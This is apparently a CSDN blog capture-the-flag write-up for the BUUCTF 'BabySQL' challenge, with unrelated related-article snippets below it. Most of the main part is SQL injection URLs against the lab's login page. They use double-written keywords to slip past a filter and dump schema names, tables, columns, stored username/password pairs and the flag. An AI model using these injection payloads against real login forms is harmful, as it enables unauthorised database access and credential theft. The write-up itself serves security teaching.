BUUCTF-[极客大挑战 2019]BabySQL 1

最新推荐文章于 2024-05-11 08:31:42 发布
最新推荐文章于 2024-05-11 08:31:42 发布
阅读量218 收藏 1
点赞数
文章标签: php mysql url thinkphp oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itgougou_/article/details/111413455
版权

题目考察了字符绕过,注释符绕过,sql双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin   .

可以看到or和by关键字被过滤

尝试双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 oorrder bbyy 3%23&password=admin

 回显正常,说明有3列

同理

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 union select 1,2,3%23&password=admin

 这里也过滤了union select关键字

双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 uniunionon selselectect 1,2,3%23&password=admin

 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,3%23&password=admin

 回显2,3

走流程暴库,爆表,爆列,爆数据

暴库

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(schema_name) frorom infoorrmation_schema.schemata%23&password=admin

 爆表

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(table_name) frorom infoorrmation_schema.tables whwhereere table_schema='geek'%23&password=admin

 爆列

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin' anandd 1=2 uniunionon selselectect 1,2,group_concat(column_name) frorom infoorrmation_schema.columns whwhereere table_name='geekuser'%23&password=admin

爆数据

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) frorom geek.geekuser%23&password=admin

 发现flag不在表中,那就换个表m发现也不是,草(一种植物)

最后在ctf库中找到flag

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,flag frorom ctf.Flag%23&password=admin

Three ooo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
微信小程序实验源码-极客学院 v1.0
12-02
微信小程序实验源码-极客学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,特色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片文件 - markdown 存放markdown解析文件 - pa
微信小程序-- 极客学院
04-02
微信小程序-- 极客学院,微信小程序,极客学院,小程序
极客标记:极客标记-极客标记系统
02-03
迁移到CouchDB进行存储 主人坏了 怪胎标记 极客标记-极客标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm install connect-nedb-session --save npm install uglify-js -g npm install babel-minify -g npm install uglify-es -g npm install uglifycss -g npm install --global rollup npm install -g puppeteer npm install superagent npm install pg npm install bluebird npm install --save superagent-response
040统计数字字符的个数
qq_44588905的博客
11-08 361
统计数字字符的个数 描述 输入一行字符,统计出其中数字字符的个数。 输入 一行字符串,总长度不超过255。 输出 输出为1行,输出字符串里面数字字符的个数。 样例输入 Peking University is set up at 1898. 样例输出 4 具体代码 #include <iostream> #include <cstring> #include <cstdio> using namespace std; int main() { char sen[25
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 233
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 1814
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
BUUCTF [极客挑战 2019]BabySQL 1
Seizerz的博客
04-03 417
打开就是个登录框,这道题是注入,那无疑就是user或者password处了 输入数据,
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5013
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 223
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF——[极客挑战 2019]BabySQL 1
小白一枚多多关注的博客
03-16 797
这道题打开后界面和前几道注入的题的界面是一样的,但难度也是呈直线的上升,我们先拿这道难的题来讲,等以后有时间了再将其他的题放出来 当我们看到这个界面的时候首先想到的应该是登陆的操作,但我们又不知道正确的用户名和密码,所以我们这里就采用管理员账号和万能密码试试 这里可以看见报错信息中没有出现or这个单词,所以我们猜想应该是用了过滤的手段将常见的sql注入的关键词给过滤掉了,为了验证这个想法我们再用联合查询试一试 果不其然,这里将union和select都过滤了(更不用说order by了),由此推理,我
微信小程序-极客学院.zip
04-14
微信小程序-极客学院.zip,小程序模板代码,基于微信小程序的在线免费小说的开发。,可以直接从源码里粘贴复制过来,虽然这样做不利于自己独立编写代码。
极客与团队-极客与团队1
08-03
前言“工程问题都很简单。人际关系才是最难的。——比尔·库格伦,前Google工程部资深副总裁生活中总是充满了离奇的转折,就好像我们俩从没想过会合作写一本软件工程
未定义标识符“qFlagLocation“
qq_35662333的博客
10-29 332
MySQL基本操作(2)
qq_41232071的博客
08-16 200
MySQL基本操作(2) 1、查询行数 判断表中是否有数据 select count( * ) from student_info ; 这条sql语句的查询结果是 5,表示这个表有5条数据。 select count( * ) from student_info where flag = 0; 我们也可以添加条件,例如 flag = 0 的数据 ,有 4条。 select count (s_sex...
(转载)netstat -r查看路由表时Flags的含义
qq_31433709的博客
08-14 6056
参考于: netstat -r查看路由表时Flags的含义 对于一条给定路由, 有五种不同的Flag: Flag Content U 该路由可以使用 G 该路由是到一个网关(路由器). 若没有此标志, 说明目的地址为直接连接的. H 该路由是到一个主机, 既目标地址是完整的主机地址而不是网络地址. 如果没有该标志, 说明该路由是到一个网络, 所以目的地址是一个网络地址(网...
BUUCTF-[极客挑战 2019]BabySQL1
Monica的博客
10-02 1076
目录 题目: 分析: 题目: 分析: 先测试是什么闭合 near ' ' 123' 'and password=' 'amdin' ' ' at line 1 通过拆分可以看出用户名和密码都是单引号闭合 猜测后台语句为: ' select xxx from xxx where username='' and password='' ' 测试有几列: 发现有过滤。 union 和select也被过滤了,试试...
为什么Redis6.0引入了多线程
最新发布
IT深耕十余载,大道之简
05-11 520
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值